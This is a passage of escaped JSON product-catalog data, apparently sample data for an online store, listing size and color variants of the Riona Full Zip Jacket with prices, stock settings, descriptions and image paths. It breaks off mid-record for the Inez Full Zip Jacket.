red_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"1230\":{\"sku\":\"WJ05-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Riona Full Zip Jacket-M-Red\",\"description\":\"<p>The Riona Basic Zip Jacket makes the perfect extra layer for cold-weather workouts. It features amazing breathability and moisture management, but full-length zipper lets you moderate your core temperature even more.<\\/p>\\n<p>&bull; Brown heather full zip rouched jacket.<br \\/>&bull; Side hand pockets for extra storage.<br \\/>&bull; High collar.<br \\/>&bull; Thick cuffs for extra coverage.<br \\/>&bull; Durable, shape retention material to longer wear.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"riona-full-zip-jacket-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"1231\":{\"sku\":\"WJ05-L-Brown\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Riona Full Zip Jacket-L-Brown\",\"description\":\"<p>The Riona Basic Zip Jacket makes the perfect extra layer for cold-weather workouts. It features amazing breathability and moisture management, but full-length zipper lets you moderate your core temperature even more.<\\/p>\\n<p>&bull; Brown heather full zip rouched jacket.<br \\/>&bull; Side hand pockets for extra storage.<br \\/>&bull; High collar.<br \\/>&bull; Thick cuffs for extra coverage.<br \\/>&bull; Durable, shape retention material to longer wear.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"riona-full-zip-jacket-l-brown\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Brown\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj05-brown_alt1.jpg,\\/w\\/j\\/wj05-brown_back.jpg\",\"image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj05-brown_alt1.jpg,\\/w\\/j\\/wj05-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Brown\"},\"1232\":{\"sku\":\"WJ05-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Riona Full Zip Jacket-L-Green\",\"description\":\"<p>The Riona Basic Zip Jacket makes the perfect extra layer for cold-weather workouts. It features amazing breathability and moisture management, but full-length zipper lets you moderate your core temperature even more.<\\/p>\\n<p>&bull; Brown heather full zip rouched jacket.<br \\/>&bull; Side hand pockets for extra storage.<br \\/>&bull; High collar.<br \\/>&bull; Thick cuffs for extra coverage.<br \\/>&bull; Durable, shape retention material to longer wear.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"riona-full-zip-jacket-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"1233\":{\"sku\":\"WJ05-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Riona Full Zip Jacket-L-Red\",\"description\":\"<p>The Riona Basic Zip Jacket makes the perfect extra layer for cold-weather workouts. It features amazing breathability and moisture management, but full-length zipper lets you moderate your core temperature even more.<\\/p>\\n<p>&bull; Brown heather full zip rouched jacket.<br \\/>&bull; Side hand pockets for extra storage.<br \\/>&bull; High collar.<br \\/>&bull; Thick cuffs for extra coverage.<br \\/>&bull; Durable, shape retention material to longer wear.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"riona-full-zip-jacket-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"1234\":{\"sku\":\"WJ05-XL-Brown\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Riona Full Zip Jacket-XL-Brown\",\"description\":\"<p>The Riona Basic Zip Jacket makes the perfect extra layer for cold-weather workouts. It features amazing breathability and moisture management, but full-length zipper lets you moderate your core temperature even more.<\\/p>\\n<p>&bull; Brown heather full zip rouched jacket.<br \\/>&bull; Side hand pockets for extra storage.<br \\/>&bull; High collar.<br \\/>&bull; Thick cuffs for extra coverage.<br \\/>&bull; Durable, shape retention material to longer wear.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"riona-full-zip-jacket-xl-brown\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Brown\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj05-brown_alt1.jpg,\\/w\\/j\\/wj05-brown_back.jpg\",\"image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj05-brown_alt1.jpg,\\/w\\/j\\/wj05-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Brown\"},\"1235\":{\"sku\":\"WJ05-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Riona Full Zip Jacket-XL-Green\",\"description\":\"<p>The Riona Basic Zip Jacket makes the perfect extra layer for cold-weather workouts. It features amazing breathability and moisture management, but full-length zipper lets you moderate your core temperature even more.<\\/p>\\n<p>&bull; Brown heather full zip rouched jacket.<br \\/>&bull; Side hand pockets for extra storage.<br \\/>&bull; High collar.<br \\/>&bull; Thick cuffs for extra coverage.<br \\/>&bull; Durable, shape retention material to longer wear.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"riona-full-zip-jacket-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"1236\":{\"sku\":\"WJ05-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Riona Full Zip Jacket-XL-Red\",\"description\":\"<p>The Riona Basic Zip Jacket makes the perfect extra layer for cold-weather workouts. It features amazing breathability and moisture management, but full-length zipper lets you moderate your core temperature even more.<\\/p>\\n<p>&bull; Brown heather full zip rouched jacket.<br \\/>&bull; Side hand pockets for extra storage.<br \\/>&bull; High collar.<br \\/>&bull; Thick cuffs for extra coverage.<br \\/>&bull; Durable, shape retention material to longer wear.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"riona-full-zip-jacket-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"1237\":{\"sku\":\"WJ05\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Riona Full Zip Jacket\",\"description\":\"<p>The Riona Basic Zip Jacket makes the perfect extra layer for cold-weather workouts. It features amazing breathability and moisture management, but full-length zipper lets you moderate your core temperature even more.<\\/p>\\n<p>&bull; Brown heather full zip rouched jacket.<br \\/>&bull; Side hand pockets for extra storage.<br \\/>&bull; High collar.<br \\/>&bull; Thick cuffs for extra coverage.<br \\/>&bull; Durable, shape retention material to longer wear.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Insulated|Jacket|Hooded|Soft Shell|Windbreaker|Full zip,material=Wool|LumaTech&trade;|Lycra&reg;,pattern=Solid,climate=Cold|Cool|Spring|Wintry,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WJ05-XS-Brown,size=XS,color=Brown|sku=WJ05-XS-Green,size=XS,color=Green|sku=WJ05-XS-Red,size=XS,color=Red|sku=WJ05-S-Brown,size=S,color=Brown|sku=WJ05-S-Green,size=S,color=Green|sku=WJ05-S-Red,size=S,color=Red|sku=WJ05-M-Brown,size=M,color=Brown|sku=WJ05-M-Green,size=M,color=Green|sku=WJ05-M-Red,size=M,color=Red|sku=WJ05-L-Brown,size=L,color=Brown|sku=WJ05-L-Green,size=L,color=Green|sku=WJ05-L-Red,size=L,color=Red|sku=WJ05-XL-Brown,size=XL,color=Brown|sku=WJ05-XL-Green,size=XL,color=Green|sku=WJ05-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj05-brown_alt1.jpg,\\/w\\/j\\/wj05-brown_back.jpg\",\"image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj05-brown_alt1.jpg,\\/w\\/j\\/wj05-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Insulated|Jacket|Hooded|Soft Shell|Windbreaker|Full zip\",\"material\":\"Wool|LumaTech&trade;|Lycra&reg;\",\"pattern\":\"Solid\",\"climate\":\"Cold|Cool|Spring|Wintry\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1238\":{\"sku\":\"WJ07-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Inez Full Zip Jacket-XS-Orange\",\"description\":\"<p>The Inez Full Zip jacket is more than a cute layer. It\'s a full-on tech wonder you\'ll use for outdoor, pre and post workout. You\'ll love how the highlighted zipper and sleeve safety trim protect and catch looks.<\\/p>\\n<p>&bull; Purple heather inset full zip jacket.<br \\/>&bull; Full zip hoodie.<br \\/>&bull; Contrast binding along the zipper, hood and sleeves.<br \\/>&bull; Inseam pockets for storage.<br \\/>&bull; Thumbholes for comfortable fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 